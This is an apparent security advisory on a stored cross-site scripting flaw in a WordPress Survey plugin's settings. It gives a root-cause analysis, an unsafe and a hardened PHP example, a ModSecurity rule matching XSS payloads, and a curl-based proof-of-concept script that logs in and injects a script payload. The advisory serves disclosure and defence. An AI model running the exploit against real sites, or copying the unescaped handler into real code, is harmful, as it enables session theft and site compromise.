Atomic Edge analysis of CVE-2026-1247 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw within the Survey plugin’s admin settings. The issue affects all versions up to and including 1.1. It allows attackers with administrator-level permissions to inject arbitrary JavaScript, which executes for other users viewing the affected administrative pages. The CVSS score of 4.4 reflects a moderate impact, tempered by the high privilege requirement and the conditional nature of the attack, which only works on multisite installations or sites where the `unfiltered_html` capability is disabled.
Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by CWE-79. The vulnerability description confirms a lack of proper neutralization for user input within the plugin’s admin settings. Without a code diff, this conclusion is based on the CWE classification and the standard WordPress security model. The plugin likely fails to use functions like `sanitize_text_field` on input or `esc_html` on output when rendering saved settings values in the WordPress admin area.
Exploitation requires an attacker to have administrator access. The attacker would navigate to the plugin’s settings page, typically found at `/wp-admin/options-general.php?page=survey` or a similar admin menu location. They would then submit a malicious payload within a vulnerable settings field; a realistic payload is an inline `<script>` element. This script would be stored in the WordPress database and executes whenever an administrator or other privileged user loads the settings page that displays the tainted option value.
Remediation requires implementing proper security hardening in two stages. First, all user input must be sanitized before storage using WordPress core functions like `sanitize_text_field` or `sanitize_textarea_field`. Second, any output of these stored values must be escaped appropriately for the HTML context using functions like `esc_html` or `esc_attr`. A patch would involve wrapping the retrieval and display of the vulnerable option with the correct escaping function.
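As an added illustration (not the Survey plugin's code, which this analysis did not have), here is the save/render pattern the root-cause and remediation paragraphs describe, first in the unsafe form and then hardened with the core functions named above; the option name `survey_settings`, the nonce name and the handler names are assumptions.

```php
<?php
// Added example, not the plugin's code. Option, nonce and handler names are assumed.

// --- Unsafe pattern: raw POST value stored, raw option echoed back ---------
function survey_save_settings_unsafe() {
    // No sanitization: whatever was submitted (including <script>) is stored.
    update_option( 'survey_settings', wp_unslash( $_POST['survey_settings'] ) );
}
function survey_render_settings_unsafe() {
    $value = get_option( 'survey_settings', '' );
    // No escaping: a stored value containing "> breaks out of the attribute
    // and any following <script> runs for every admin who opens this page.
    echo '<input type="text" name="survey_settings" value="' . $value . '">';
}

// --- Hardened pattern ------------------------------------------------------
// 1. register_setting() attaches a sanitize_callback that runs on every save,
//    independently of whether the saving user holds unfiltered_html.
add_action( 'admin_init', function () {
    register_setting( 'survey_options', 'survey_settings', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field',
        'default'           => '',
    ) );
} );

// 2. A custom handler still checks capability and nonce, then sanitizes.
function survey_save_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'survey_save_settings', 'survey_settings_nonce' );
    $clean = sanitize_text_field( wp_unslash( $_POST['survey_settings'] ?? '' ) );
    update_option( 'survey_settings', $clean );
}

// 3. Output is escaped for the context it lands in: esc_attr() inside an
//    attribute, esc_html() in element content. Escape on output even though
//    input was sanitized; the database may still hold values saved by old code.
function survey_render_settings_hardened() {
    $value = get_option( 'survey_settings', '' );
    wp_nonce_field( 'survey_save_settings', 'survey_settings_nonce' );
    echo '<input type="text" name="survey_settings" value="' . esc_attr( $value ) . '">';
    echo '<p>Current value: ' . esc_html( $value ) . '</p>';
}
```

Escaping is chosen per output context: `esc_attr` would not be enough inside a `<script>` block or a URL, where `wp_json_encode` or `esc_url` apply instead.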
The impact of successful exploitation is client-side code execution within the context of a victim’s browser session. An attacker could steal session cookies, perform actions on behalf of the victim administrator, or deface the WordPress admin panel. This could lead to a full site compromise if the victim has high-level privileges. The scope is changed (S:C in the CVSS vector) because the injected script executes in the browser of any user who views the compromised admin page, potentially affecting multiple users from a single injection point.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-1247 (metadata-based)
# This rule targets the presumed admin settings update endpoint for the Survey plugin.
# It blocks POST requests containing common XSS payloads in the 'survey_settings' parameter
# when sent to the WordPress admin-post.php handler with the specific plugin action.
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" \
    "id:20261247,phase:2,deny,status:403,chain,msg:'CVE-2026-1247: Survey Plugin Stored XSS via Admin Settings',severity:'CRITICAL',tag:'CVE-2026-1247',tag:'WordPress',tag:'Plugin-Survey',tag:'attack-xss'"
    SecRule ARGS_POST:action "@streq survey_save_settings" "chain"
    SecRule ARGS_POST:survey_settings "@rx (?i)<script[^>]*>|<img[^>]+onerror=|onload\s*=|javascript:" \
        "setvar:'tx.cve_2026_1247_blocked=1',t:none,t:urlDecodeUni,t:htmlEntityDecode"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1247 - Survey <= 1.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings
/*
* This PoC simulates an administrator exploiting the stored XSS in the Survey plugin settings.
* Assumptions:
* 1. The vulnerable endpoint is the standard WordPress admin form for plugin settings.
* 2. The form uses a POST request and includes a WordPress nonce for security.
* 3. The exact parameter name for the vulnerable setting is unknown; we assume 'survey_settings'.
* 4. The attacker already possesses administrator credentials.
*/
$target_url = 'https://example.com';            // base URL of the target site (placeholder)
$login_url  = $target_url . '/wp-login.php';    // login form endpoint
$admin_user = 'attacker';
$admin_pass = 'password';
$payload = '<script>alert("Atomic Edge XSS Test");</script>';
// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Step 1: Authenticate as administrator
$login_data = array(
    'log' => $admin_user,
    'pwd' => $admin_pass,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);
// Step 2: Navigate to the plugin's settings page to extract the nonce.
// The exact settings page URL is inferred from common WordPress patterns.
$settings_page_url = 'https://example.com/wp-admin/options-general.php?page=survey';
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);
// Extract the nonce from the page (this is a simplified example; a real exploit would parse the HTML).
// For this PoC, we assume a nonce named '_wpnonce' in a field with name 'survey_settings_nonce'.
preg_match('/name="survey_settings_nonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
die("Could not extract security nonce. The page structure may differ.");
}
// Step 3: Submit the malicious payload to the settings save handler.
// The save action is likely triggered via admin-post.php or admin-ajax.php.
// We assume a POST to admin-post.php with an action of 'survey_save_settings'.
$exploit_url = 'https://example.com/wp-admin/admin-post.php';
$exploit_data = array(
'action' => 'survey_save_settings',
'survey_settings_nonce' => $nonce,
'survey_settings' => $payload, // The vulnerable parameter
'submit' => 'Save Changes'
);
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);
if (strpos($response, 'Settings saved') !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) == 302) {
    echo "[+] Payload likely injected. Visit the plugin settings page to trigger the XSS.\n";
} else {
    echo "[-] Exploit attempt may have failed. Check assumptions about endpoint and parameters.\n";
}
curl_close($ch);
?>